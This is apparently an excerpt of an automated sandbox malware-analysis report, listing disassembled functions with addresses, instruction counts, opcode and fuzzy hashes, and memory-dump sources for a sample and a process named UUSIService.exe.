Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: \jf
API String ID: 0-2703509894
Opcode ID: 7100367c47d87fedfc054d45d9978656ea311170a41f2a6d7fc3ba00a2e28fd9
Instruction ID: b9314921fd1f2cb749bbec6e9ae1e95bdf6e366d9d9b7f03c24f94c15325b2f8
Opcode Fuzzy Hash: 7100367c47d87fedfc054d45d9978656ea311170a41f2a6d7fc3ba00a2e28fd9
Instruction Fuzzy Hash: 6B218C35E01218EFCF04EFB5D8809DEBFF6AF89340F2081B6E502A7241DA315E448B61

Function 00A41BD8 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

(Pf, xrefs: 00A41C3C

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: (Pf
API String ID: 0-3614791539
Opcode ID: f2596653e3f29d83b9546020507b85430270819073dc73e1736f9e35b140bfeb
Instruction ID: 49c64751c5e57130f0d30e8c29de9639eca57408b1d7bb149fd255f042eb54a6
Opcode Fuzzy Hash: f2596653e3f29d83b9546020507b85430270819073dc73e1736f9e35b140bfeb
Instruction Fuzzy Hash: 9611AF35E01218EFCF04DBB9D8805DEBFF6AFC9300F2485A6E501BB241DA315D448B60

Function 00A42528 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

,rf, xrefs: 00A4259B

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: ,rf
API String ID: 0-2010036623
Opcode ID: 8a5757e93d05da93131011b37ba5fde3a70e9632363f8cf2f439071dd0527ab1
Instruction ID: 4528706b6705c8b5c2f3e2d38616cb7ac22cd8cd0ef908013dfa3111ed1929a8
Opcode Fuzzy Hash: 8a5757e93d05da93131011b37ba5fde3a70e9632363f8cf2f439071dd0527ab1
Instruction Fuzzy Hash: 51114231E0070A8BCB05AFB9D8645AEF7B5EFC9240710C719E51A67214EF34A98587D0

Function 00A40DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee6cc6539eecda21cdae1a004b6254d4cc008366f7511f92438051d4c11a2a0
Instruction ID: 508200a12558b6f6db4463320eb836a61b4a621c90b68c6879cb96cf91c6264f
Opcode Fuzzy Hash: 5ee6cc6539eecda21cdae1a004b6254d4cc008366f7511f92438051d4c11a2a0
Instruction Fuzzy Hash: 8CF1C435A002498FDB15DFA8C484ADCBBF2BF89320F199195E845BB362D771AD85CF60

Function 00A425F0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477bf3f51aa95f122493987864f9db3741b6ddd1d33c29ea5743810a5296e29f
Instruction ID: d756f1bde9ba5bec414bf84bda8e6e453cf7930af0b639e44af9ef4f86be8cb4
Opcode Fuzzy Hash: 477bf3f51aa95f122493987864f9db3741b6ddd1d33c29ea5743810a5296e29f
Instruction Fuzzy Hash: E0512475E002198FDB14CFA9D981BDEFBF5BF88310F548129E415AB254DB74A842CB81

Function 00A425E4 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216f76129564670371c990ce64020a8c702c8af352dd78cd404dc84fe0f4e581
Instruction ID: f1c3b4aec804870b5fdda5020c270506ccbf8abee8bb929fe4121b23ae8a914f
Opcode Fuzzy Hash: 216f76129564670371c990ce64020a8c702c8af352dd78cd404dc84fe0f4e581
Instruction Fuzzy Hash: 075156B5E002599FDB14CFA9C884BEEFBF1BF88700F14812AE415AB294DB749846CF41

Function 00A427E0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69df6b16296714065d7151ff30007fdad515ff43f6d0e3d9930607d1b3071f1e
Instruction ID: 5860203da1f6f5aeaed90ecde0679c641e7ac2bff7f515fb598161af80d82727
Opcode Fuzzy Hash: 69df6b16296714065d7151ff30007fdad515ff43f6d0e3d9930607d1b3071f1e
Instruction Fuzzy Hash: A1516575E00319DFDB14CFA9D9907DEBBF1BF88300F208029E859AB250DB34A842CB81

Function 00A40B28 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0bfbd75f8d0f37356d8c9956136efc52b79e65cdb8f29d21ef614ee31f655a
Instruction ID: 85d32f19f88c95b876beadc6d311ca1201a63a2da1d6cfa96354a7a383a8a96f
Opcode Fuzzy Hash: ca0bfbd75f8d0f37356d8c9956136efc52b79e65cdb8f29d21ef614ee31f655a
Instruction Fuzzy Hash: BD41CF74A04745CFDB22CF28D840A9EBBF2BFC9340B14465AE486EB2A5D734A844CF50

Function 00A41E78 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8de99ee79991c3ec3228e03da04fccc4a06bba225c83375067acd737515e88
Instruction ID: 2f16f6cde45bdc1c64435f7974f57c0de3a531ceed26aafd3a3aee5cbd87c69c
Opcode Fuzzy Hash: fc8de99ee79991c3ec3228e03da04fccc4a06bba225c83375067acd737515e88
Instruction Fuzzy Hash: 8741D470A017419FDB25DF68E940A9EBBF2AFC4740F10866EE45ADB395DB30AC45CB90

Function 00A427D6 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 679148f93547561d9d34f7b50cd727c1618741ff45373d72b002b2d8d5a4cf31
Instruction ID: a773dea2ed6719e193b336ef6fa5dec8f9f45df88034efd31090f2f89e2f6235
Opcode Fuzzy Hash: 679148f93547561d9d34f7b50cd727c1618741ff45373d72b002b2d8d5a4cf31
Instruction Fuzzy Hash: AB4165B5E003599FDB14CFA9D980BDEBBF1BF88700F208129E459EB254DB749845CB85

Function 00A42990 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e2f7e9432770620d730bef4a283459529cbe741aa5a3ab118772295d2dae66
Instruction ID: 5bad5f99696fa01e9cc4e646660f836e7716090bcfc121126fb644569742c19e
Opcode Fuzzy Hash: 29e2f7e9432770620d730bef4a283459529cbe741aa5a3ab118772295d2dae66
Instruction Fuzzy Hash: 943104B5D01218DFDB24CFA9D890BDEBBF5BF88350F24842AE805B7250DB75A945CB50

Function 00A40A60 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb479abd7fde221af548ed634aa61556c25b5acfbe9031e9b2784f789b82fd8
Instruction ID: 9b643097eefcfb859cbee83480fd749d67b09050d2be833f30c3d74155dfeeec
Opcode Fuzzy Hash: dbb479abd7fde221af548ed634aa61556c25b5acfbe9031e9b2784f789b82fd8
Instruction Fuzzy Hash: 8A2117343005108FC789EB39D868A2D7BE6FF8DA11B6640A9E506CF3B6DA65DC058B91

Function 00A40A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab9e06328c97b9c3d2de2c4b461ccb5aee52aa78bdb8a8cb5c6c470625638d2
Instruction ID: 7550cf26e6d639c8de5cd89a709144b1ff82a7ab7d3bbdf9a16513ebb93b810f
Opcode Fuzzy Hash: cab9e06328c97b9c3d2de2c4b461ccb5aee52aa78bdb8a8cb5c6c470625638d2
Instruction Fuzzy Hash: 801119343104148FC784EB39D498A1D7BE6FFCDA11B6540A8E50ACB3B6DE71EC058B95

Function 00A40E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b7c1884da1d9bbde0a9ad3d5f54d3478dbdd499d2762ea96cd66b8fb6599a88
Instruction ID: 5cfcac5018f72bf6129829f7312992ec5bc67a2f14f75ec959066c82e88e6c94
Opcode Fuzzy Hash: 8b7c1884da1d9bbde0a9ad3d5f54d3478dbdd499d2762ea96cd66b8fb6599a88
Instruction Fuzzy Hash: 64216F39A002488FDB05CF98D4849DCBBF2FF89320F589095E905AB261D771AD85DF60

Function 00A41309 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7048d05a3f6f2b677fd519b0e2caa957198dd3fe5d24714a65d8d11b388fd964
Instruction ID: ceda5368b0eac8a233d5c65c3f9909e9278216c280a7eb83c6935f9980507763
Opcode Fuzzy Hash: 7048d05a3f6f2b677fd519b0e2caa957198dd3fe5d24714a65d8d11b388fd964
Instruction Fuzzy Hash: F7114832E0464A8BCF019BB9D8105EDBFB2EFC6300B284297D105B7151DB70244BC7A0

Function 00A40CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a238e7d635f008a1c73c77055914af16c6be0062383792ee628868658336d95c
Instruction ID: 9da459f6d0b45419ec72172ba9b563668bc63a8113dccb6976f13c1bdcae27cc
Opcode Fuzzy Hash: a238e7d635f008a1c73c77055914af16c6be0062383792ee628868658336d95c
Instruction Fuzzy Hash: A0118E32D04749ABCB01CFB9E8404DDFFB1EF99310F254666E111B7650E774258ACB60

Function 00A40989 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876c1442f1c89bcbc4a60c185f2679bcc6710efec0ada2a665e82f32bc45eb60
Instruction ID: e8f1cb7fac3f41a8088ae43f56827eceb8245c9bc9802660a685c83c1f41154b
Opcode Fuzzy Hash: 876c1442f1c89bcbc4a60c185f2679bcc6710efec0ada2a665e82f32bc45eb60
Instruction Fuzzy Hash: 2A114C74510506CFDB15EF74E894948BF72FB64300B226669D405E732DEB305986CF80

Function 00A40879 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4ae478f92276210806f16d284aedf1f4b49349fc50f921bbe954819d226284
Instruction ID: d3bc1e52ac6310355aaeb0941ec95085906eb25caabfd695eb42f68d2a0521ee
Opcode Fuzzy Hash: bb4ae478f92276210806f16d284aedf1f4b49349fc50f921bbe954819d226284
Instruction Fuzzy Hash: 4E018C32D0464A9BCB018BB9DC504DDBBB2EFCA300F258696D111B75A1EB70254ACBA1

Function 00A40CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5bcd886ab85ceddc423f4e0ba43371dabf9fb8c26833d3dc2d39ffcfb4b3eb5
Instruction ID: 412a65fb1bf8afa58d6cb6b550abf7572f818a27e8af58b354fe5d3f0f9fbd12
Opcode Fuzzy Hash: d5bcd886ab85ceddc423f4e0ba43371dabf9fb8c26833d3dc2d39ffcfb4b3eb5
Instruction Fuzzy Hash: 33011232D1060EABCB00DFB9D8404DDFBB5EF99310F254766E11577650E774255ACB50

Function 0065D035 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123305959.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d662b24386640388bd3c1711ae7ac78476a99523d1dfcc44115a6dbb3a28033
Instruction ID: 687d101282383c5f92df0033a291e0cd95f4db33f0f1b94305f5408fcc6b80d7
Opcode Fuzzy Hash: 6d662b24386640388bd3c1711ae7ac78476a99523d1dfcc44115a6dbb3a28033
Instruction Fuzzy Hash: 8001A7711053449AE7309F65C9C47A7BB99EF41726F18C45AEE094F2C2C279D84BCA71

Function 00A40998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9745251856b9589435c30bdca5bd9b1d2cd7d08954927287576c9b0e3d0967c4
Instruction ID: 848763645eebf1440f0bbfe4f05fbced39b5c4a07bbc9b3982464c8304174cb7
Opcode Fuzzy Hash: 9745251856b9589435c30bdca5bd9b1d2cd7d08954927287576c9b0e3d0967c4
Instruction Fuzzy Hash: F3111C78510506CFDB15FF64E89494CBBB2FB54300721A669D509A732CEB34A986CF80

Function 00A41D69 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ded937190121a4290a76ac4598526b88d1fa50250512ee91c65dca1fe4d691
Instruction ID: e6bf2b76a2c91cff010881c7489497f073273d02cefccc6200672b4d166f3138
Opcode Fuzzy Hash: 93ded937190121a4290a76ac4598526b88d1fa50250512ee91c65dca1fe4d691
Instruction Fuzzy Hash: D801DF32D0464A9BCF00DBB9D8005DEFFB2AFCA310F2583A6D11177560EB70258ACBA0

Function 00A41CD8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe119aaeeebcfe1f4595f562e5526c91b17e84d2ec761aa2135c27d2c211594
Instruction ID: 02b8cb58c84d9ed9261ff1e50018de1f1a89362af9526a3071a1d5723644a221
Opcode Fuzzy Hash: cbe119aaeeebcfe1f4595f562e5526c91b17e84d2ec761aa2135c27d2c211594
Instruction Fuzzy Hash: 73016235A00218DBDB14AB64C815BEEB7B2FB88344F11442CD402AB3A5DB769C45CBD5

Function 00A413E0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9bba0e29892c92d2cf2a3102c8a89ff63e71b6fd36a73b2940fb927e7159879
Instruction ID: 75d14b370e01629dd86236c7e500f62c0abdaeacd0ab61a1bf95dfe37b50b7a0
Opcode Fuzzy Hash: e9bba0e29892c92d2cf2a3102c8a89ff63e71b6fd36a73b2940fb927e7159879
Instruction Fuzzy Hash: 29F0C87591018A9BCF05DF74C9659EFBFB29F84310F148A29D512B7280DEB0594BD781

Function 00A40D51 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8984bbdc4db5ee04f03ad82ed34042d20c9d66e64d8a1d5e7e8cbef0f409c9f7
Instruction ID: 09ecda2b381e65641cfbee69b3ef12c5674f357dfc0063ec55ac6b5a51980290
Opcode Fuzzy Hash: 8984bbdc4db5ee04f03ad82ed34042d20c9d66e64d8a1d5e7e8cbef0f409c9f7
Instruction Fuzzy Hash: 48F02831D10245DBCB14DB74C8619EFBFB15F84300F04892AC542A7280DEB06506C782

Function 00A40901 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297b3e97ac196614579e785712361b2b513d22d148d14999b4f88b7570b137ce
Instruction ID: 4a240b0176c230df097754f2ba89687889ef301733b18079f164713ccfc09a8f
Opcode Fuzzy Hash: 297b3e97ac196614579e785712361b2b513d22d148d14999b4f88b7570b137ce
Instruction Fuzzy Hash: 3BF0F672A141869FDB05DB60C8A59EFBFB25FC4300F05492AD503B7292DE705606DBC2

Function 0065D034 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123305959.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69a1454e6d4262db78bb69f34e58ab8ba2c18918656e41828ccaa62f95744a8
Instruction ID: 0f088707741a6c89a9f5b2287ac11849c6df0ca2e61ba3aaba190b151915dd7d
Opcode Fuzzy Hash: a69a1454e6d4262db78bb69f34e58ab8ba2c18918656e41828ccaa62f95744a8
Instruction Fuzzy Hash: E0F06D72405344AAE7208F1AD884BA2FF98EB91725F18C45AEE484F2D6C2799C45CAB1

Function 00A413F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178c21a7e694ebfdec68f04cdc91bf03e1146420be54ce0e64923e390b1b7168
Instruction ID: 6bb2eb7c57b3ddfea18c03f8f27aed7963300807dcf0fb4330eab6010780cbd5
Opcode Fuzzy Hash: 178c21a7e694ebfdec68f04cdc91bf03e1146420be54ce0e64923e390b1b7168
Instruction Fuzzy Hash: F0F0A772E1024ADBDF04DBA4C865AEFBFB69F84310F158926D503B7380DEB0694697D2

Function 00A41E00 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50deeb63f779fc55906c4900b18250cc96efe11476ec0300c5335d4f687f457
Instruction ID: 8ff737ecbc2d797ba15629d45e15793dec1cf9fa4cfa5270e12c18a779c5c20a
Opcode Fuzzy Hash: d50deeb63f779fc55906c4900b18250cc96efe11476ec0300c5335d4f687f457
Instruction Fuzzy Hash: 46F0E276E1024AD7CF04DBA4C866AEFBBB69F84300F448826D902B7380DEB0690686C1

Function 00A40910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9b6e61df6507180a650d94221a4346aeac681dd05bc2d9e16fef8a3310c46c
Instruction ID: c3df350da2fc49cb03c2c6ec4f0771edf0aa10f3874230809efa07ec6d233c2d
Opcode Fuzzy Hash: 9a9b6e61df6507180a650d94221a4346aeac681dd05bc2d9e16fef8a3310c46c
Instruction Fuzzy Hash: 37F0E232A1010AD7DF04DB64C865AEFBFB69FC4300F048926D602B7380DEB0690697C1

Function 00A40848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172c94a045a3f8e604fa9b929fe35774553edf26f2e446b45b89143ed8766570
Instruction ID: 2bd24421894f4fda8f074129143d51048d89d089911f94ec4ff838f838befe35
Opcode Fuzzy Hash: 172c94a045a3f8e604fa9b929fe35774553edf26f2e446b45b89143ed8766570
Instruction Fuzzy Hash: DFD01772905208EFDB41CFA4D90575D7BB9BB45280F650496E448C7201DA329E50D791

Function 00A4157D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b5c2e102cd257e68abef87298b551dd72b335e895cb1cbb023c0649a4df7ce
Instruction ID: 6421f4f172cf329aa9084ea2b2b52bc16e91c2b30fd29fc617047b6fa97cd679
Opcode Fuzzy Hash: e7b5c2e102cd257e68abef87298b551dd72b335e895cb1cbb023c0649a4df7ce
Instruction Fuzzy Hash: 9BD0A736F0A3459FCF119FB8A8400DCBF70DAC113171482D3D155C7152C630C4558722

Analysis Process: UUSIService.exePID: 4152, Parent PID: 2244COMMON

Executed Functions

Function 01386E58 Relevance: .5, Instructions: 519COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335d346da4b1d452d602d931a94a477e953da737cd8c8285bb243130e76cdd33
Instruction ID: 7e78e18b688f0600a7d8e5f64038bdf787fe8df60e35101ef571d304d9b0bc81
Opcode Fuzzy Hash: 335d346da4b1d452d602d931a94a477e953da737cd8c8285bb243130e76cdd33
Instruction Fuzzy Hash: 77223970A00359CFCB15DF68C88499DBBF2BF89314F1582A9E419AB3A5DB30EC45CB90

Function 01386E49 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f493e6af706d1362023d719e174604a3c48ee695fc9a50b0e3f287743d69c618
Instruction ID: 72eb4da7c48c9d21e5c371b91398b378464ad6e34c08e3d683f11dbebc71a847
Opcode Fuzzy Hash: f493e6af706d1362023d719e174604a3c48ee695fc9a50b0e3f287743d69c618
Instruction Fuzzy Hash: A1023870A00359CFCB15DFA8C894A9DBBF2BF89314F254669E415AB3A5DB30EC45CB90

Function 01384D40 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25186350f9ddfb7631d11e0b1739cb75b6768852174695b3012bd73b3b61af4
Instruction ID: 23258d131b28d517da6bffa115ec907b598a336d914beaaf420bb87f3937a4fc
Opcode Fuzzy Hash: f25186350f9ddfb7631d11e0b1739cb75b6768852174695b3012bd73b3b61af4
Instruction Fuzzy Hash: 0602F774A01209DFDB05DF68D480A9DBBF2FF88314F198595E449AB366DB30ED86CB80

Function 01383DCF Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

k, xrefs: 01383E2F

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-467967572
Opcode ID: 8494fd45144f14110c515b43d2d2b97d108d41d583d065b35380e17704c32dfd
Instruction ID: b8a8b2f862ff13c8174645820f674d6316ed90475c5e2b08e242eb57255f8008
Opcode Fuzzy Hash: 8494fd45144f14110c515b43d2d2b97d108d41d583d065b35380e17704c32dfd
Instruction Fuzzy Hash: 5C310531A00719CFCB25DF69C8406DEBBF1FF89610B10865DD499AB391D731E805CB61

Function 01380758 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0d633af425aa5ac2ca5dbe7c84d60cafe5bb6cb859fce017ed9b578417b0e39
Instruction ID: fa35f0cba54d0eee90a32a17ca891e6a8130c7cc64b33713d84c5543009f6d8e
Opcode Fuzzy Hash: d0d633af425aa5ac2ca5dbe7c84d60cafe5bb6cb859fce017ed9b578417b0e39
Instruction Fuzzy Hash: 9651E0706043419FDB16EF38C850BAA7BA2EF86318F1585ADE5458B3A2DB35EC46CB41

Function 013866F1 Relevance: .6, Instructions: 557COMMON

Download Yara Rule

